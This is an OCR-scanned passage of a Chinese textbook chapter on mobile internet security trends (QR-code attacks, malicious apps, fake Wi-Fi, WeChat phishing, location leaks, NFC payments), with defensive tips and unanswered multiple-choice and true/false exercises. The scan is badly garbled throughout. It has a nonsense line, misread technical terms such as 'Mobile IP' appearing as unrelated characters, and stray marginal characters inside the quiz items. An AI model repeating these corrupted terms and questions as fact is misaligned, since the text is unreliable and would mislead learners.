移动 游戏 、 移 动 广告 、 移 动 电子 商务 、 移 动 视频 等 业务 模式 流量 变现 能 力 快速 提升 。 

(5) 用 户 期 盼 跨 平 台 互通 互联 ，HTMLS5 技术 让 人 充满 期 待 。 

目前 形成 的 iOS、Android、Windows Phone 三 大 系统 各 自 独 立 ， 相 对 封闭 、 割 裂 ， 应 
用 服务 开发 者 需要 进行 多 个 平台 的 适 配 开 发 ， 这 种 隔绝 有 违 互联 网 互通 互联 之 精神 。 不 同 
品牌 的 智能 手机 ， 甚 至 不 同 品牌 、 类 型 的 移动 终端 都 能 互联 互通 ， 是 用 户 的 期 待 ， 也 是 发 
展 趋势 。 

(6) 大 数据 挖掘 成 蓝海 ， 精 准 营销 潜力 凸显 。 

随 着 移动 带宽 技术 的 迅速 提升 ， 更 多 的 传 感 设备 、 移 动 终端 随时 随地 地 接 入 网 络 ， 加 
之 云 计 算 、 物 联网 等 技术 的 带动 ， 中 国 移动 互联 网 也 逐渐 步 入 “大 数据 ”时 代 。 目 前 的 移 
动 互 联网 领域 ， 仍 然 是 以 位 置 的 精准 营销 为 主 ， 但 未 来 随 着 大 数据 相关 技术 的 发 展 ， 人 们 
对 数据 挖掘 的 不 断 深入 ， 针 对 用 户 个 性 化 定制 的 应 用 服务 和 营销 方式 将 成 为 发 展 趋势 ， 它 
将 是 移动 互联 网 的 另 一 片 蓝海 。 


10.3.2 ”移动 互联 网 安全 发 展 趋势 


1. 针对 二 维 码 的 攻击 行为 

二 维 码 以 信息 量 大 、 高 效 识别 、 反 应 迅速 等 优势 成 为 信息 时 代 的 新 宠 ， 人 们 通过 智能 
手机 随手 一 扫 就 能 快速 获得 各 类 信息 。 由 于 二 维 码 将 图 片 、 汉 字 、 字 符 等 以 电子 图 片 形式 
存储 起 来 ， 视 觉 上 改变 了 原 有 内 容 ， 因 此 也 为 不 法 分 子 提供 了 犯罪 的 机 会 。 

一 旦 黑客 将 木马 、 恶 意 网 站 链接 及 垃圾 信息 等 植 入 到 二 维 码 中 ， 只 要 用 户 扫 描 、 解 码 
就 会 中 毒 ， 并 导致 恶意 扣 费 。 同 时 ， 中 毒手 机 还 有 可 能 向 通信 录 的 联系 人 自动 传送 带 毒 文 
件 或 诈骗 信息 ， 并 删除 系统 重要 程序 ， 严 重 时 还 会 造成 移动 终端 系统 崩溃 。 

不 仅 如 此 ， 二 维 码 还 能 将 用 户 姓 名 、 电 话 、 身 份 证 等 信息 用 做 名 片 、 火 车 票 、 机 票 的 
身份 识别 ， 而 许多 用 户 在 处 理 废旧 票据 时 ， 忽 略 了 上 面 存储 该 类 信息 的 二 维 码 ， 将 票据 随 
意 丢 弃 ， 导 致 这 些 个 人 信息 很 容易 被 不 法 分 子 获取 。 


2. 移动 设备 严重 威胁 个 人 信息 安全 


智能 手机 、 平 板 电脑 等 移动 设备 为 网 络 信息 传递 带 来 便捷 的 同时 ， 也 面临 着 许多 信息 
安全 风险 。 一 些 黑客 制作 恶意 APP 免费 为 用 户 提供 下 载 ， 而 这 些 APP 会 通过 事先 设 定好 
的 命令 ， 将 用 户 移动 设备 中 的 个 人 隐私 信息 发 送 给 黑客 ， 导 致 信息 泄露 。 

同时 ， 不 少 正常 的 APP 在 下 载运 行 后 需要 用 户 输入 大 量 个 人 信息 ， 一 旦 这 些 软件 遭 到 
攻击 ， 里 面 存储 的 信息 就 会 泄露 。 而 一 些小 软件 迫 于 生存 压力 ， 会 在 程序 中 附带 一 些 流氓 
行为 ， 导 致 正常 软件 和 灰色 软件 的 界限 渐渐 模糊 。 因 此 ， 安 全 厂商 只 有 在 软件 行为 上 进行 
识别 和 拦截 ， 才 能 有 效 控制 恶意 行为 ， 让 用 户 在 使 用 软件 的 同时 不 会 “被 流氓 ”。 
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堂 沙 若 煤 泪 ”十 水 并 容 FH 人 4 台 强 也 


另外 ， 用 户 通 过 公共 Wi-Fi 遭遇 信息 安全 风险 的 情况 也 不 在 少数 。 黑 客 往往 会 搭建 一 
个 假 的 免费 公共 Wi-Fi 供用 户 使 用 ， 当 用 户 在 这 个 “ 黑 网 ”内 进行 网 络 交易 或 输入 隐私 信 
息 时 ， 黑 客 便 可 轻易 截获 所 有 数据 。 


3. 微 信 沦 为 黑客 的 “工具 ” 


微 信 作为 新 型 网 络 社交 工具 ， 广 泛 为 当代 人 所 应 用 ， 而 在 方便 用 户 的 同时 ， 也 成 为 不 
法 分 子 实施 犯罪 的 温床 ， 并 有 进一步 发 展 的 趋势 。 不 法 分 子 利用 盗 取 的 QQ 账号 登录 微 信 ， 
对 通信 录 内 的 亲友 发 送 电 话费 充值 、 汇 款 等 钓鱼 欺诈 信息 ， 信 以 为 真 的 用 户 因 此 便 会 上 当 
受骗 。 同 时 ， 不 法 分 子 还 会 以 陌生 人 身份 对 用 户 提出 添加 好 友 邀 请 ， 许 多 网 友 出 于 好 奇 ， 
往往 会 直接 添加 ， 而 这 些 “ 好 友 ” 会 发 送 一 些 诸如 私密 照片 类 的 网 址 链接 ， 一 旦 按 指令 输 
入 账号 密码 点 击 进入 后 ， 就 会 出 现 账号 密码 被 盗 的 情况 。 

同时 ， 不 少 用 户 都 喜欢 使 用 微 信 中 “ 摇 一 摇 ” 和 “查找 附近 的 人 ”这 类 功能 ， 然 而 由 
于 微 信 注 册 门 槛 低 ， 又 无 须 实名 认证 ， 因 此 当 用 户 与 陌生 人 聊天 交友 时 ， 并 不 了 解 对 方 的 
真实 身份 ， 而 这 些 人 中 不 乏 居心 区 测 者 ， 这 就 造成 巨大 的 安全 隐患 。 这 些 所 谓 的 好 友 往 往 
以 套 取 个 人 隐私 及 银行 账户 密码 为 目的 ， 用 户 一 旦 轻信 ， 就 有 可 能 上 当 受 骗 。 

4. LBS 定位 服务 成 为 隐私 泄露 工具 

智能 移动 设备 的 应 用 程序 中 ， 诸 如 微 信 、 微 博 等 均 有 移动 定位 功能 ， 甚 至 一 些 与 地 理 
位 置 毫 不 相关 的 应 用 程序 中 也 可 以 收集 用 户 的 当前 所 在 位 置 。 这 一 功能 在 方便 用 户 了 解 周 
围 各 类 资讯 和 查找 自己 当前 位 置 的 同时 ， 也 可 能 因此 暴露 个 人 信息 。 用 户 在 微 博 中 发 表 心 
情 或 近 照 等 一 些 公 开 信息 时 ， 开 启 的 定位 功能 会 将 其 所 在 位 置 自 动 发 送 到 互联 网 中 ， 迅 速 
反映 出 所 在 地 点 ， 这 些 资料 对 于 一 般 人 来 说 并 没有 很 大 用 处 ， 而 对 于 别有用心 的 不 法 分 子 
来 说 ， 就 成 为 可 以 用 来 犯罪 的 信息 来 源 。 

5. NFC 技术 进军 移动 支付 ， 安 全 问题 引发 思考 

随 着 移动 支付 的 迅猛 发 展 ， 用 户 可 以 通过 移动 支付 进行 订 票 、 缴 费 、 网 购 及 处 理 金融 
业务 等 操作 。NFC( 近 距离 无 线 通信 ) 作 为 移动 支付 中 近 场 支付 的 代表 模式 已 经 快速 发 展 起 
来 ， 这 种 支付 技术 无 须 进入 手机 系统 进行 操作 ， 通 过 近 距 离 数据 传输 就 能 实现 支付 业务 。 


10.3.3 ”建议 及 解决 方案 


与 以 前 遇 到 的 安全 威胁 相 比 ， 智 能 手机 用 户 将 面临 更 多 ， 更 为 复杂 的 安全 威胁 。 为 此 
强烈 建议 广大 手机 用 户 ， 提 高 手机 安全 意识 ， 确 保 用 户 手机 安全 。 


1. 尽量 选择 正规 渠道 购买 手机 


水 货 手 机 是 目前 木马 和 恶意 软件 的 主要 传播 源头 ， 其 多 会 在 出 货 前 被 “刷机 ” 植 入 吸 
费 、 流 氓 推广 木马 等 ， 而 由 已 嵌入 系统 底层 ， 很 难 通过 常规 方式 卸载 清除 。 为 此 ， 手 机 安 
全 专家 建议 用 户 在 购买 新 手机 时 应 尽量 选择 大 型 正规 卖场 购买 手机 ， 购 买 手机 后 ， 建 议 安 
装 如 “360 手机 卫士 ”、“ 人 金山 手机 毒霸 ”等 专业 安全 产品 对 其 进行 安全 扫描 ， 避 免 手 机 
暗藏 恶意 软件 。 
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2. 选择 官方 网 站 、 正 规 渠 道 下 载 应 用 

算 改 热门 正常 应 用 植 入 广告 等 恶意 代码 成 为 普遍 现象 ， 通 过 下 载 应 用 而 感染 恶意 软件 
的 比例 惊人 ， 为 了 从 源头 杜绝 安全 隐患 ， 手 机 安全 专家 建议 用 户 尽量 选择 专业 、 可 信 的 应 
用 市 场 、 应 用 的 官网 ， 以 及 如 金山 手机 助手 等 经 过 安全 检测 的 渠道 下 载 应 用 。 


3. 下 载 安装 应 用 前 细心 留意 应 用 权限 


当前 ， 通 过 算 改 、 伪 装 正常 应 用 威胁 手机 安全 的 恶意 软件 ， 会 在 安装 权限 中 有 细微 体 
现 ， 如 要 求 获取 的 权限 与 正常 应 用 的 获取 列表 有 明显 不 同 ， 如 莫名 要 求 得 到 敏感 高 危 权 限 
等 ， 为 此 ， 建 议 用 户 在 下 载 安 装 应 用 前 ， 细 心 留意 应 用 权限 ， 避 免 权限 被 获取 后 而 威胁 手 
机 安全 。 


4. 及 时 为 手机 系统 打上 安全 补丁 


今后 ， 利 用 Android 系统 高 危 漏洞 攻击 原理 的 木马 将 会 大 面积 出 现 。 及 时 为 手机 安装 
安全 补丁 ， 可 以 有 效 阻止 这 类 木马 入 侵 。 

5. 安装 手机 安全 产品 ， 为 手机 安全 保驾 护航 

为 进一步 全 面 保护 手机 安全 ， 手 机 安全 专家 建议 用 户 选择 安装 具有 云 安全 智能 拦截 功 
能 的 手机 安全 软件 ， 如 360 手机 卫士 等 ， 进 行 主动 防御 与 一 键 查 杀 ， 远 离 吸 费 、 流 氓 推广 、 
盗号 和 隐私 窃取 软件 ， 全 面 保护 手机 安全 。 


小 ” 结 


本 章 主 要 介绍 了 移动 互联 网 的 发 展 和 面临 的 挑战 ， 系 统 介 绍 了 针对 移动 互联 网 的 各 种 
恶意 行为 等 知识 。 通 过 本 章 的 学 习 , 读者 可 以 了 解 有 关 飞 速 发 展 的 移动 互联 网 的 相关 知识 ， 
掌握 常用 的 防范 方法 ， 同 时 提高 手机 使 用 过 程 中 的 安全 意识 。 


本 章 习 题 


一 、 单 项 选择 题 


1. 下 面 关 于 移动 互联 网 的 描述 不 正确 的 是 ( 和 
A. 移动 互联 网 是 由 移动 通信 技术 和 互联 网 技术 融合 而 生 
B. 移动 互联 网 需要 实现 用 户 在 移动 过 程 中 通过 移动 设备 随时 随地 访问 互联 网 
C. 移动 互联 网 由 接 入 技术 、 核 心 网 、 互 联网 服务 三 部 分 组 成 
D. 移动 互联 网 指 的 是 互联 网 在 移动 
2. 下 面 关 于 移动 互联 网 核心 网 描述 不 正确 的 是 ( je 
A. 核心 网 一 般 均 包含 接 入 路 由 器 和 网 关 
B. 核心 网 负责 管理 用 户 移动 信息 
C. 核心 网 保证 用 户 在 移动 中 连接 不 中 断 
D. 核心 网 为 用 户 提供 互联 网 应 用 服务 
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3. 移动 互联 网 的 产业 模型 不 包括 ( 。 )。 
A. 芯片 制造 商 ”B. 终端 制造 商  C. 电信 运营 商 ”DD. 互联 网 企业 
4. 计算 机 网 络 的 应 用 越 来 越 普遍 ， 它 的 最 大 特点 是 (  )。 


A. 可 以 浏览 网 页 B. 存储 容量 扩大 

C. 可 实现 资源 共享 D. 使 信息 传输 速度 提高 
5. 目前 手机 应 用 通信 协议 不 包括 ( 。”)。 

A. SIP B. WAP12 C. WAP2.0 D. Web 
6. 在 浏览 Internet 时 ， 此 时 手机 扮演 的 是 (  ) 角 色 。 

A. 服务 器 B. 客户 端 

C. 服务 器 和 客户 端 D. 控制 器 
7. 被 称 为 世界 信息 产业 第 三 次 浪潮 的 是 (  )。 

A. 计算 机 B. 互联 网 C. 传 感 网 D. 物 联 网 
8. 第 三 次 信息 革命 在 ( 。”) 年 。 

A. 1999 B. 2000 C. 2004 D. 2010 
9. 计算 模式 每 隔 ( 。“) 年 发 生 一 次 变革 。 

A. 10 B. 12 (os D. 20 
10. 智慧 地 球 (Smarter Planet) 是 谁 提 出 的 ( 。”)。 

A. 无 锡 研究 院 ”B. 温 总 理 C. IBM D. 奥巴马 


11. 2009 年 8 月 7 日 温家宝 总 理 在 江苏 无 锡 调 研 时 提出 下 面 ( 。”) 概 念 。 

A. 感受 中 国 B. 感应 中 国 C. 感知 中 国 D. 感想 中 国 
2. 利用 REFID、 传 感 器 、 二 维 码 等 随时 随地 采集 物体 的 动态 信息 ， 指 的 是 (  )。 

A. 可 靠 传递 B. 全 面 感 知 C. 智能 处 理 D. 互联 网 

13. 通过 网 络 将 感知 的 各 种 信息 进行 实时 传送 ， 指 的 是 (  )。 

A. 可 靠 传递 B. 全 面 感知 C. 智能 处 理 D. 互联 网 

14. 利用 计算 机 技术 ， 及 时 地 对 海量 的 数据 进行 信息 控制 ,真正 达到 了 人 与 物 的 沟通 、 

物 与 物 的 沟通 ， 指 的 是 (  )。 


亢 A. 可 靠 传递 B. 全 面 感知 C. 智能 处 理 D. 互联 网 
高 15. “三 网 融合 ”中 的 “三 网 ” 指 的 是 ( )。 
这 A. 电话 网 、 有 线 电视 网 和 万 维 网 ”B. 电话 网 、 有 线 电视 网 和 互联 网 
C. 电话 网 、 互 联网 和 万 维 网 D. 有 线 电视 网 、 互 联网 和 万 维 网 
和 16. 目前 互联 网 使 用 的 他 技术 是 (  )。 
材 A. IPv2 B. IPv3 C. IPv4 D. IPv6 
17. 下 面 哪 一 项 不 属于 移动 接 入 协议 ( )。 
其 A. 802.11 协议 往 B. 802.16 协议 往 
本 C. 802.3 协议 入 D. CDMA 协议 答 
列 18. 下 列 无 线 通信 协议 中 ，( ”) 协 议 支持 的 最 大 传输 速率 最 高 。 
A. WiFi B. GPRS C. 3GPP DD. 卫星 通信 协议 
19. IEEE802.11g 协议 支持 的 最 大 传输 速率 是 (  )。 
A. 2Mbit/s B. 11Mbit/s C. 54Mbit/s D. 100Mbit/s 


@ 
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-下面 四 种 无 线 局 域 网 协议 最 早 提出 的 是 ( 。 )。 


A. 802.11 B. 802.11a C. 802.11g D. 802.11n 
. 无 线 城 域 网 使 用 的 无 线 协议 是 (  )。 

A. 802.3 B. 802.6 C. 802.11 D. 802.16 
.下 面 关 于 TD-SCDMA 描述 正确 的 是 ( 。 )。 

A. 技术 最 为 成 熟 B. 是 指 时 分 同步 码 分 多 址 

C. 应 用 最 为 广泛 D. 是 由 欧洲 提出 的 标准 
.下 面 关于 WCDMA 描述 不 正确 的 是 ( 。 )。 

A. 是 指 宽带 码 分 多 址 B. 是 由 CDMA 演变 而 来 

C. 是 由 美国 提出 的 标准 D. 技术 最 为 成 熟 


. 广 域 移动 是 指 (  )。 

A. 移动 节点 在 同一 接 入 路 由 器 下 不 同 接 入 点 之 间 移 动 

B. 移动 节点 在 同一 网 关 下 不 同 接 入 路 由 器 之 间 移 动 

C. 移动 节点 在 不 同 网 关 之 间 移动 

D. 移动 节点 在 不 同 基站 之 间 移 动 

.用 于 解决 区 域 移动 管理 的 协议 是 ( )。 

A. MIP 协议 B. PMIP 协议  C. 卫 协 议 D. TCP 协议 
多 项 选择 题 

移动 互联 网 的 产业 模型 包括 (  )。 

A. 终端 制造 商 ” B. 电信 运营 商 。” C. 服务 提供 商 ”D. 芯片 制造 商 
移动 互联 网 需要 解决 的 关键 问题 包括 ( 。 )。 

A. 网 络 移动 B. 随时 接 入 C. 随地 接 入 D. 应 用 服务 
3GPP 无 线 通 信 标 准 包括 (  )。 


A. WCDMA B. TD-SCDMA C. CDMA D. CDMA2000 
移动 管理 包括 ( 。 )。 

A. 链 路 内 移动 管理 B. 基站 移动 管理 

C. 区 域 移动 管理 D. 广 域 移动 管理 

下 面 属于 代理 移动 P 实体 的 有 (  )。 

A. 移动 节点 MN B. 接 入 热点 AP 

C. 移动 接 入 网 关 MAG D. 区 域 移动 锚 点 LMA 


下 面 关于 广 域 移动 管理 描述 不 正确 的 有 (  )。 

A. 移动 节点 进行 广 域 移动 时 ，IP 地 址 将 发 生变 化 

B. 广 域 移动 管理 需要 移动 耻 协议 支持 

C. 移动 节点 进行 广 域 移动 时 ， 连 接 必然 中 断 

D. 移动 节点 进行 广 域 移动 时 ， 必 须 通 过 归属 代理 转发 数据 
下 面 关于 代理 移动 全 和 移动 他 的 关系 描述 正确 的 有 ( 。 )。 
A. 代理 移动 也 是 由 移动 人 P 发 展 而 来 

B. 代理 移动 全 中 的 LMA 也 可 以 充当 移动 全 中 的 HA 
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C. 代理 移动 全 是 为 了 解决 区 域 移 动 时 保持 全 地 址 不 变 的 问题 
D. 代理 移动 耻 和 移动 瑟 不 能 同时 使 用 
8. 目前 手机 应 用 通信 协议 有 (  )。 
A. SIP B. WAP1.2 C. WAP2.0 D. Web 
三 、 判 断 题 


1. Intermet 起 初 用 于 美国 军 方 。 ( ) 
2. 移动 互联 网 需要 解决 的 关键 问题 主要 包括 随时 接 入 、 随 地 接 入 和 应 用 服务 。 ( 。 ) 
3. ”3GPP 无 线 通信 标准 包括 WCDMA、TD-SCDMA 和 CDMA2000 三 种 。 ( ) 
4. 目前 移动 互联 网 三 大 力量 的 竞争 焦点 在 移动 互联 网 用 户 入 口 ， 即 用 户 第 一 接 
触 点 。 Cy 
5. 表示 通过 Internet 打 电 话 的 缩写 是 IM。 co 
6. 中 国电 信 的 战略 定位 “新 三 者 ”是 指 智能 管道 的 主导 者 、 综 合 平台 的 提供 者 、 内 


容 和 应 用 的 参与 者 。 (> 
7. 未 来 的 电信 和 网、 电视 网 和 互联 网 都 可 以 承载 多 种 信息 化 业务 ， 创 造 出 更 多 种 融合 
业务 ， 而 不 是 三 张 网 合成 一 张 网 ， 因 此 三 网 融合 不 是 三 网 合 一 。 , 
8. 电信 网 和 互联 网 的 融合 早已 开始 ， 所 以 三 网 融合 的 关键 是 广播 电视 网 和 电信 网 、 
互联 网 的 融合 。 0 
9. IPv6 是 下 一 代 互 联网 的 基石 和 灵魂 。 kk y 
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